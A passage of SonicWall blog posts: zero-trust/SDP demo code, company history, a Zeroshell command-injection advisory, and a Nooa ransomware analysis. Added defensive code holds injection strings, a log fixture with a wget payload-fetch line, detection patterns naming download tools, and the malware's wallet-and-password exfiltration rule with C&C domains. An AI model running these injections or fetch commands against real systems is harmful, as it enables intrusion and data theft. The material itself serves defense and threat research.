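    knock = make_spa(SPA_KEY, "laptop-7f3a")
    return {
        "spa_accepted": gw.verify_spa(knock),
        "replayed_spa_rejected": not gw.verify_spa(knock),
        "entitled_service_allowed": gw.connect(token, "git.internal:22"),
        "other_service_denied": not gw.connect(token, "hr.internal:443"),
        "expired_token_denied": not gw.connect(token, "git.internal:22", now=time.time() + 3600),
        "bad_password_denied": ctl.authenticate("alice", "wrong", "laptop-7f3a", good) is None,
        "unenrolled_device_denied": ctl.authenticate("alice", "correct horse", "laptop-zzzz", good) is None,
        "bad_posture_denied": ctl.authenticate("alice", "correct horse", "laptop-7f3a", {}) is None,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print("{:<28} {}".format(check, "ok" if ok else "FAIL"))
```

The two keys are deliberately separate: the SPA key protects the data plane (who may knock at all), the token key protects the control plane (what an authenticated identity may reach), which mirrors the control/data-plane split the text describes. Note that a replayed knock is refused even though its MAC is valid, and that a token for one service says nothing about any other.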

In contrast with the traditional model, Zero Trust is a network security concept built around the idea that networks should trust nothing and verify everything. Implementing Zero Trust requires verifying anything that attempts to connect to your network before access is granted, and continuously re-validating that access for the duration of the connection.

SDP is one of the best and most advanced ways to implement Zero Trust, as SDP is agnostic to underlying IP infrastructure while securing all network connections and the infrastructure itself. SDP architecture separates the control plane, where trust is established, from the data plane — thus providing least-privilege access to tightly defined micro-segments of the network and resources.

SDP enforcement is applied at the network layer, before a transport-layer connection is completed and before any application session is established. A Zero Trust implementation using SDP therefore lets organizations defend against the new attack vectors that keep surfacing in perimeter-centric network designs.

SonicWall Cloud Edge Secure Access enables a simple Network-as-a-Service (NaaS) for site-to-site and hybrid cloud connectivity to AWS, Azure, Google Cloud and more. By combining Zero-Trust, SDP and least-privilege security, the solution enables organizations to offer remote-work flexibility while still protecting high-value assets from costly security breaches.

It Started with Speed: Seven Generations of SonicWall Products

This month marks 30 years since SonicWall’s founding in 1991. To celebrate, we’ll be spending the month of August spotlighting the history, customers, products, partners and people that have helped shape SonicWall over the past three decades and will continue to inspire us in the years ahead.

If asked to name the first SonicWall appliance, many would say the TZ 170 or the original SOHO. But you’d need to go back at least five more years for the answer: the original SonicWall appliance wasn’t a firewall at all, and the original SonicWall wasn’t a firewall company.

In 1995, SonicWall (then called Sonic Systems) introduced its first internet appliance: the QuickStream/3. It was a three-port, multi-protocol remote access server offering remote users access to Apple’s incumbent AppleTalk, as well as then up-and-coming Ethernet technology.

But over the next year, two things happened: The market for Apple peripherals contracted, and Sonic Systems recognized a new opportunity — a lack of affordable firewalls for small- and medium-sized businesses (SMBs).

The SonicWALL Brings Speed, Strength and Security to SMBs

In October 1997, Sonic Systems released the Interpol, a secure, affordable and easy-to-manage NAT/firewall. It represented the first security appliance designed for SMBs, and was a huge hit.

A year later, in 1998, Sonic Systems changed the appliance’s name to the SonicWALL. The name was devised to evoke a combination of speed, strength and security, and was so well received that in 1999, the entire brand followed suit.

The following year, on the heels of a successful initial public offering (IPO), SonicWALL introduced two new appliances: the SOHO, designed for small businesses (the acronym stands for “Small Office, Home Office”) and the PRO, which delivered enterprise-class firewall throughput and VPN concentration to medium-sized businesses and branch offices.

Shortly after the turn of the millennium, SonicWALL introduced the Gen 2 product line, including the SOHO2 and the TELE2, an even more compact appliance for branches and telecommuters (it supported a grand total of five users).

To help deal with the growing complexity of network security, SonicWALL also announced the Global Management System (GMS), which enabled the management of several SonicWALL appliances from a single place.

The SonicWall TZ 105

The TZ, the TELE3 and Other New Technology

The first Gen 3 appliances, including the SOHO3 and the TELE3, followed just a short year later, in 2001. This rapid advancement pace paid dividends — by 2002, the company had shipped its 250,000th unit — so SonicWALL kept it up. 2003 brought the introduction of Gen 4 products, including the first offering in the award-winning TZ Series: the TZ 170.

Another firewall series still going strong today made its debut in 2007: the NSA Series, designed for mid-sized organizations of 250 users and up. As part of the Gen 5 release, the company introduced the NSA E-5500, the NSA E-6500 and the NSA E-7500.

Displaying its commitment to continued innovation, SonicWALL was also granted its first patent that year: SWUS-001 – U.S. Patent No. 7,158,986.

The SonicWall NSA 220

Far Beyond Firewalls: SonicWall Transforms into a Cybersecurity Leader

The sale of SonicWALL’s 1 millionth unit kicked off the 2010s, and this decade would be marked by a massive uptick in innovation. In the years since its first patent was awarded, SonicWall employees have been granted more than 325 additional patents, many of these for advancements that would come to the fore in the latter half of the decade.

In 2016, SonicWALL — newly rebranded as SonicWall to coincide with a change in both ownership and leadership — released both its Gen 6 line of NGFWs, its largest to date, as well as SonicOS 6.0.

Two more big announcements followed in 2018, both of which further cemented SonicWall as a leader in advanced threat protection. At that year’s RSA Conference, the company unveiled the SonicWall Capture Cloud Platform, which tightly integrates security, management, analytics and real-time threat intelligence across the company’s portfolio of security products.

Later that same year, SonicWall announced Real-Time Deep Memory Inspection (RTDMI™), a proprietary machine learning-based memory inspection technology included as part of the SonicWall Advanced Threat Protection (ATP) sandbox service.

In 2019, less than 10 years after its millionth unit was shipped, SonicWall celebrated the sale of its 3 millionth unit. Recognizing that the rapid growth of cybersecurity architectures was creating management complexities, SonicWall introduced the Capture Security Center, a single-pane-of-glass management solution designed to govern the entire range of SonicWall security operations and services.

A Boundless Future: Gen7 and Beyond

March 2020 ushered in the biggest change to the global workforce since the introduction of the PC. As the COVID-19 pandemic swept across the globe, SonicWall helped countless businesses rapidly make the switch to remote work, helping keep employees working and businesses running in highly uncertain times.

While this shift was rapid, it was one SonicWall had long been preparing for. With the introduction of the Boundless Cybersecurity model in April 2020, the company cemented its commitment to closing the growing cybersecurity business gap created by a growth in the attack surface, a shortage of cybersecurity personnel and stagnant IT budgets. By allowing organizations to know the unknown, providing unified visibility and control, and employing disruptive economics, SonicWall has helped businesses weather both rapid shifts in the business world and unprecedented increases in cybercrime.

With the needs of today’s highly distributed, highly mobile workforce now fully at the forefront, SonicWall has recently embarked on the most ambitious refresh of its product portfolio in company history, introducing solutions that are already being widely recognized by third-party testing and reporting agencies.

SonicWall’s new Gen 7 next-generation firewall line, which delivers industry-leading performance, high port density and more, is powered by the newest version of SonicWall’s operating system. SonicOS 7 has been redeveloped from the ground up to be more advanced, agile and user-friendly than any of its predecessors.

Today, SonicWall offers a full cybersecurity portfolio of products, including firewalls, wireless security, secure email, switches, SASE, secure remote and mobile access, endpoint protection, cloud security and more.

But despite three decades of growth, SonicWall has stayed true to the same vision championed by two brothers three decades ago: to make quality cybersecurity products accessible to businesses of all sizes, and to stand behind them.

SonicWall Celebrating Three Decades of Putting Customers First

SonicWall has enjoyed tremendous growth over the past 30 years, but it hasn’t happened by accident. From the beginning, we’ve strived to keep the customer at the forefront of our business — a decision that has taken us from our roots as a small peripherals provider to the full-service cybersecurity leader we’ve become.

Even before the company released its first firewall, SonicWall (then called Sonic Systems) had dedicated itself to helping small- and medium-sized businesses (SMB) find more cost-effective ways to deploy, operate and protect their network. Despite the countless advancements, developments and changes that brought the company from that point to now, we’ve never wavered in our commitment to this mission.

We have expanded on it, however. Today, SonicWall serves more than 500,000 customers in more than 215 countries and territories, and among these are many of the world’s largest organizations, enterprises and government agencies.

There are many reasons customers choose SonicWall. Our product portfolio incorporates the newest threat-prevention technologies while continuing to offer an industry-leading TCO. Our Boundless Cybersecurity model offers a platform approach to cybersecurity, employing artificial intelligence and machine learning to help businesses bridge the cybersecurity business gap. And our solutions continue to earn the approval of third-party testing agencies.

But one factor is cited again and again in their decision to stay with SonicWall: Our customer service. We strive to provide a variety of avenues for customers to address any question or issue, and take the feedback we receive on the resolution process seriously.

Because some customers don’t want to have to make a phone call to resolve a simple issue, we’ve modernized self-service options that have earned high ratings from users. SonicWall’s self-service score is a best-in-class 16:1, meaning that among those who choose to troubleshoot an issue on their own, the overwhelming majority are able to quickly and easily find a satisfactory resolution. And our knowledgebase, which is home to a wide assortment of technical documents and how-tos, has earned a 96% satisfaction rating.

But for more complex issues, we recognize that there’s often no substitute for speaking to a real person. SonicWall’s technical agents have earned an 86% satisfaction rating, and 56% of our support cases are resolved in the first business day — allowing our customers to more quickly resume business as usual.

We’ve seen similar positive responses via the Gartner Peer Insights portal. Despite the fact that the SonicWall Community has only been online for a little over a year, it’s already earning a 4.2 out of 5 from respondents. Respondents that have utilized technical support have been similarly satisfied, ranking that facet a 4.3 out of 5.

And, true to its name, SonicWall ranks high in timeliness of vendor response, earning a 4.4 out of 5 — the same score given to SonicWall’s service and support overall.

As a whole, SonicWall earns a 4.62 out of 5 rating — higher than the Gartner Peer Insights score for a majority of our competitors, and a testament to our continued commitment to customer service, before, during and after the sale.

We’d like to take this opportunity to thank each and every one of the customers who have chosen to put their trust in us. It’s been a privilege serving you over the past 30 years, and we hope to spend the next 30 years doing all we can to continue earning your loyalty and exceeding your expectations.

Zeroshell command injection vulnerability

The SonicWall Capture Labs threat research team has observed attacks exploiting a command injection vulnerability in Zeroshell.

Zeroshell is a small open-source Linux distribution for servers and embedded systems that is dedicated to implementing router and firewall appliances administered entirely through a web interface. It is available for x86/x86-64 platforms and for ARM devices such as the Raspberry Pi.

Zeroshell command injection vulnerability | CVE-2019-12725

The goal of a command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (form fields, cookies, HTTP headers, URL parameters and so on) to a system shell. The attacker-supplied commands usually run with the privileges of the vulnerable application, although a permissive sudo rule, as in this case, can turn that into root. Command injection vulnerabilities are largely the result of insufficient input validation.

An unauthenticated command injection vulnerability exists in ZeroShell 3.9.0 in the URL. Because sudo is configured to run the relevant binary without a password (NOPASSWD), tar’s checkpoint options (--checkpoint together with --checkpoint-action=exec, which run a command of the caller’s choosing) can be used to execute commands as root.
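As an added illustration of the pattern just described (example code, not ZeroShell’s), here is a hypothetical request handler that concatenates one URL parameter into a shell command, next to two hardened versions: one that allowlists the value and runs the program without a shell, and one for code that cannot drop the shell and therefore quotes the value. The handler names, the parameter value and the use of echo are constructed for the example; nothing here reproduces the ZeroShell request.

```python
"""Added example (not ZeroShell code): the command-injection pattern from the text
next to hardened versions. A hypothetical handler receives one URL parameter and runs
a local command with it; the only command run here is echo, so the demo is harmless."""
import re
import shlex
import subprocess


def vulnerable_handler(param):
    """Concatenates untrusted input into a command line and hands it to /bin/sh.
    Everything after a ';', '|', '&&' or newline in param becomes another command."""
    completed = subprocess.run("echo " + param, shell=True, capture_output=True, text=True)
    return completed.stdout


# Allowlist for the parameter. It must start with an alphanumeric so the value can never
# be parsed as an option (for example tar's --checkpoint-action=exec=..., which runs a
# command by itself even when no shell is involved).
SAFE_VALUE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def hardened_handler(param):
    """Validates against the allowlist, then passes the value as ONE argv element with
    shell=False, so metacharacters are never interpreted by a shell."""
    if not SAFE_VALUE.fullmatch(param):
        raise ValueError("rejected parameter: %r" % param)
    completed = subprocess.run(["echo", param], shell=False, capture_output=True, text=True)
    return completed.stdout


def quoted_shell_handler(param):
    """For code that cannot drop the shell (a CGI written in sh, say): quote the value
    so the shell sees a single literal word. Keep the allowlist; quoting alone does not
    stop option injection."""
    if not SAFE_VALUE.fullmatch(param):
        raise ValueError("rejected parameter: %r" % param)
    completed = subprocess.run("echo " + shlex.quote(param), shell=True,
                               capture_output=True, text=True)
    return completed.stdout


# Constructed attacker values: a second command, and an option-injection attempt.
INJECTION = "hello; echo INJECTED"
OPTION_INJECTION = "--checkpoint-action=exec=id"

if __name__ == "__main__":
    print("vulnerable_handler :", repr(vulnerable_handler(INJECTION)))
    for handler in (hardened_handler, quoted_shell_handler):
        for value in ("hello", INJECTION, OPTION_INJECTION):
            try:
                print(handler.__name__, ":", repr(handler(value)))
            except ValueError as exc:
                print(handler.__name__, ":", exc)
```

Passing an argv list stops the shell from interpreting metacharacters, but it does not stop argument injection: a value that starts with a dash and reaches a program such as tar can still select options, which is why the allowlist also forbids a leading dash.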

Exploit attempts observed in the wild follow the same pattern: the request targets the vulnerable URL with the section set to NoAuthREQ, so no authentication is required, and the injected commands change directory and download a malicious script from an attacker-controlled server.
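For the defender’s side, the following added example (not a SonicWall signature) scans web-server access-log lines for the indicators that characterize these requests: shell metacharacters in the decoded query string, a download tool such as wget or curl, and tar’s --checkpoint-action=exec. The log lines, client addresses and the /cgi-bin/example path are constructed for the example and do not reproduce the ZeroShell URL.

```python
"""Added example, not Capture Labs' detection logic: flag access-log requests whose
decoded query string carries command-injection indicators. SAMPLE_LOG, its addresses
and the /cgi-bin/example path are constructed for this example."""
import re
import urllib.parse

SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [12/Aug/2021:10:01:07 +0000] "GET /cgi-bin/example?x=%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.9%2Fa.sh HTTP/1.1" 200 77
203.0.113.9 - - [12/Aug/2021:10:01:09 +0000] "GET /cgi-bin/example?x=--checkpoint-action%3Dexec%3Did HTTP/1.1" 200 40
10.0.0.6 - - [12/Aug/2021:10:02:00 +0000] "GET /report?name=q3-summary&x=1 HTTP/1.1" 200 1024
"""

# Common log format: client, ident, user, [timestamp], "METHOD url PROTO", status ...
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

INDICATORS = [
    ("shell metacharacter", re.compile(r"[;|`\n]|\$\(|&&")),     # second command / substitution
    ("download tool", re.compile(r"\b(wget|curl|tftp)\b")),      # fetching a payload
    ("tar checkpoint exec", re.compile(r"--checkpoint-action=exec")),
]


def decode_query(url):
    """Percent-decode the query string twice: double encoding is a common way to slip past
    filters that decode only once."""
    query = urllib.parse.urlsplit(url).query
    once = urllib.parse.unquote_plus(query)
    return urllib.parse.unquote_plus(once)


def scan(log_text):
    """Return one hit per request that matches at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                      # unparseable line; a real pipeline would count these
        decoded = decode_query(m.group("url"))
        reasons = [name for name, rx in INDICATORS if rx.search(decoded)]
        if reasons:
            hits.append({"src": m.group("src"), "ts": m.group("ts"), "url": m.group("url"),
                         "decoded_query": decoded, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["ts"], hit["reasons"], repr(hit["decoded_query"]))
```

The indicator list is intentionally small; in production you would key it to the parameters the application actually passes to a shell, and treat a hit on a 200 response (as in the constructed lines above) as a stronger signal than a hit on a 4xx.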

 

SonicWall Capture Labs provides protection against this threat via following signatures:

      • IPS 2366: Zeroshell Remote Code Execution
      • GAV: Mirai.ELF_2

IoCs

  • IP: 5.206.227.228
  • SHA256: c22dce4ab0b5a0b2d8e921652ecc3df116568c1afd7222747a8bb1a87a2cfc59
  • SHA256: ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477

Nooa ransomware seeks out your crypto wallets and passwords

The SonicWall Capture Labs threat research team has recently been tracking malware that does more than encrypt files and demand a ransom. In the ransomware space there has been an increase in malware that also steals data from infected machines. Some ransomware actors use this data to extort even more money from their victims. The operators behind this sample, however, are after crypto wallets, browser cookies and passwords.

Infection Cycle:

Upon infection, the file encryption process starts immediately. Files hosted on any attached external or network drives are also encrypted. Encrypted files are given a “.nooa” filename extension.

The following DNS requests are made by the malware:

  • api.2ip.ua
  • securebiz.org
  • astdg.top
  • prophefliloc.tumblr.com

The following files are created on or downloaded to the system. The nss3, freebl3, softokn3 and mozglue DLLs are Mozilla’s NSS libraries, which a stealer needs in order to decrypt credentials saved by Firefox; msvcp140 and vcruntime140 are the Visual C++ runtime they depend on:

  • C:\SystemID\PersonalID
  • %SYSTEMDRIVE%\_readme.txt
  • %SYSTEMDRIVE%\$WinREAgent\_readme.txt
  • %SYSTEMDRIVE%\$WinREAgent\Scratch\_readme.txt
  • %USERPROFILE%\_readme.txt
  • %APPDATA%\Microsoft\Windows\Recent\_readme.lnk
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\4EQF0LUO\msvcp140[1].dll
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\LHLB6AIE\nss3[1].dll
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\N5CLIG2L\freebl3[1].dll
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\N5CLIG2L\softokn3[1].dll
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\VQ7BRAAE\mozglue[1].dll
  • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\VQ7BRAAE\vcruntime140[1].dll
  • %LOCALAPPDATA%\{rand}\build2.exe [Detected as: GAV: Conficker.gen (Worm)]

PersonalID contains an ID that is unique to each infection:

PLtnD1U6oAmgxgJ2nJik1mY9SwUQg07CiN0zSet1

_readme.txt contains the ransom note.

The malware then downloads and runs build2.exe, which reports the infection to a C&C server and receives compressed data in return. Decompressing that data reveals the following rule, which lists the files targeted for exfiltration:

DESKTOP;%DESKTOP%\;*wallet*.*:*2fa*.*:*backup*.txt:*backup*.png:*backup*.jpg:*code*.txt:*code*.png:*code*.jpg:*password*.*:*auth*.txt:*auth*.png:*auth*.jpg:*crypto*.*:*key*.txt:*key*.png:*key*.jpg:*ledger*.*:*metamask*.*:*blockchain*.*:*bittrex*.*:*binance*.*:*coinbase*.*:*trezor*.*:*exodus*.*:*UTC--201*.*;300;true;movies:music:mp3;lnk;

build2.exe then searches the system for the file types and directories listed above. This includes 2FA data, crypto wallets and browser cookies. If such data is found, it is compressed into a zip archive and uploaded to the C&C server. The malware also captures and sends system information and a screenshot of the desktop.
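As an added example (not the malware’s own code), the parser below reads that rule into its fields and decides, for a given file, whether build2.exe would collect it. The field meanings are inferred from the captured string and are assumptions: the rule name, the root directory, colon-separated filename globs, a size limit (assumed to be in KB), a recurse flag, directory names to skip and extensions to skip. The file listing it is run against is constructed.

```python
"""Added example, not the malware's code: parse the target rule build2.exe receives from
its C&C and decide which files it would collect. Field meanings are inferred from the
captured string and are assumptions, noted inline."""
import fnmatch
from collections import namedtuple

Rule = namedtuple("Rule", "name root globs max_size_kb recurse skip_dirs skip_exts")

# The rule string exactly as captured, split across lines only for width.
RULE_TEXT = (
    r"DESKTOP;%DESKTOP%\;*wallet*.*:*2fa*.*:*backup*.txt:*backup*.png:*backup*.jpg:"
    r"*code*.txt:*code*.png:*code*.jpg:*password*.*:*auth*.txt:*auth*.png:*auth*.jpg:"
    r"*crypto*.*:*key*.txt:*key*.png:*key*.jpg:*ledger*.*:*metamask*.*:*blockchain*.*:"
    r"*bittrex*.*:*binance*.*:*coinbase*.*:*trezor*.*:*exodus*.*:*UTC--201*.*;"
    r"300;true;movies:music:mp3;lnk;"
)


def parse_rule(text):
    """Split the ';'-delimited rule into its seven fields (the trailing ';' is a terminator)."""
    fields = text.rstrip(";").split(";")
    if len(fields) != 7:
        raise ValueError("expected 7 fields, got %d" % len(fields))
    name, root, globs, size, recurse, skip_dirs, skip_exts = fields
    return Rule(
        name=name,
        root=root,                                             # assumed: directory to sweep
        globs=[g.lower() for g in globs.split(":") if g],      # matched case-insensitively
        max_size_kb=int(size),                                 # assumed unit: KB
        recurse=recurse.lower() == "true",                     # assumed: descend into subfolders
        skip_dirs={d.lower() for d in skip_dirs.split(":") if d},
        skip_exts={e.lower() for e in skip_exts.split(":") if e},
    )


def would_collect(rule, relative_path, size_kb):
    """True if a file at relative_path (relative to the rule's root, either separator)
    of size_kb kilobytes satisfies every constraint of the rule."""
    parts = [p.lower() for p in relative_path.replace("\\", "/").split("/") if p]
    if not parts:
        return False
    name, dirs = parts[-1], parts[:-1]
    if dirs and not rule.recurse:
        return False                                  # subdirectories only when recurse is set
    if any(d in rule.skip_dirs for d in dirs):
        return False                                  # e.g. a Movies folder is skipped
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    if ext in rule.skip_exts:
        return False                                  # .lnk shortcuts are skipped
    if size_kb > rule.max_size_kb:
        return False                                  # large files are not worth the upload
    return any(fnmatch.fnmatchcase(name, g) for g in rule.globs)


def sweep(rule, listing):
    """Apply the rule to a directory listing of (relative_path, size_kb) tuples."""
    return [path for path, kb in listing if would_collect(rule, path, kb)]


# Constructed desktop listing; none of these files come from the page.
SAMPLE_LISTING = [
    ("wallet.dat", 12),
    ("notes/2fa-codes.png", 80),
    ("keys/UTC--2019-03-01T10-00-00.000Z--0abc.json", 2),   # geth-style keystore file name
    ("backup.mp4", 40000),            # *backup* only matches .txt/.png/.jpg
    ("Movies/password.txt", 1),       # skipped directory
    ("MetaMask.lnk", 1),              # skipped extension
    ("password.txt", 5000),           # over the size limit
]

if __name__ == "__main__":
    rule = parse_rule(RULE_TEXT)
    print(rule.name, rule.root, len(rule.globs), "globs; max", rule.max_size_kb, "KB")
    print("would collect:", sweep(rule, SAMPLE_LISTING))
```

Reading the rule this way shows what the operators value: anything that looks like a wallet, seed, 2FA backup or exchange export, small enough to upload quickly, with media folders and shortcuts excluded to cut noise.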

 

information.txt contains system information from the infected machine.

We reached out to the email addresses provided in the ransom message and received a response from the operators.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Waledac.gen.2 (Worm)
  • GAV: Conficker.gen (Worm)

This threat is also detected by SonicWall Capture ATP with RTDMI and by the Capture Client endpoint solution.